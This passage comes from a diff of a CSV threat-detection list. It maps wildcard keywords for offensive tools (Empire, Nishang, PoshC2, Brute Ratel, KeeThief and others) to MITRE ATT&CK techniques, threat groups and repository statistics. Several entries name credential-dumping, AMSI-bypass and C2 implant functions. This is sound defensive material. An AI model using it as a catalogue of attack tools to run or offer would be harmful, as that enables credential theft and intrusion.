TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketNTLMSSPAuth*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketNTLMSSPNegotiate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketRPCBind*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketRPCRequest*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketSMB*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PassHashes*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Get-PassHints*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*get-passnotexp*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get-password-policy.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Get-PEBasicInfo*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1104","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PEHeader.ps1*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*getPositionImplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" 
+"*getPositionImplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*getprivs.bin*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*getprivs.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*get-process *amsi.dll*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get-process *amsi.dll*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Get-RBCD-Threaded*","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","1","N/A","N/A","2","115","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z" -"*Get-RegistryAlwaysInstallElevated*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-RegistryAlwaysInstallElevated*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-RegistryAutoLogon*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-RegistryAlwaysInstallElevated*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-RegistryAlwaysInstallElevated*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-RegistryAutoLogon*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetRektBoy724/SharpUnhooker*","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","365","103","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" "*Get-RemoteCachedCredential*","offensive_tool_keyword","AD exploitation cheat sheet","Get cached credentials (if any)","T1110","TA0006","N/A","N/A","Credential 
Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-RemoteCachedCredential*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" -"*Get-RemoteDesktopUserSessionList*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Get-RemoteDesktopUserSessionList.*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-RemoteDesktopUserSessionList*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-RemoteDesktopUserSessionList.*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Get-RemoteLocalAccountHash*","offensive_tool_keyword","AD exploitation cheat sheet","Get local account hashes","T1110","TA0006","N/A","N/A","Credential 
Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-RemoteLocalAccountHash*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*Get-RemoteMachineAccountHash*","offensive_tool_keyword","AD exploitation cheat sheet","Get machine account hash for silver ticket attack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*getremoteprocesslisting*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Get-RickAstley*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 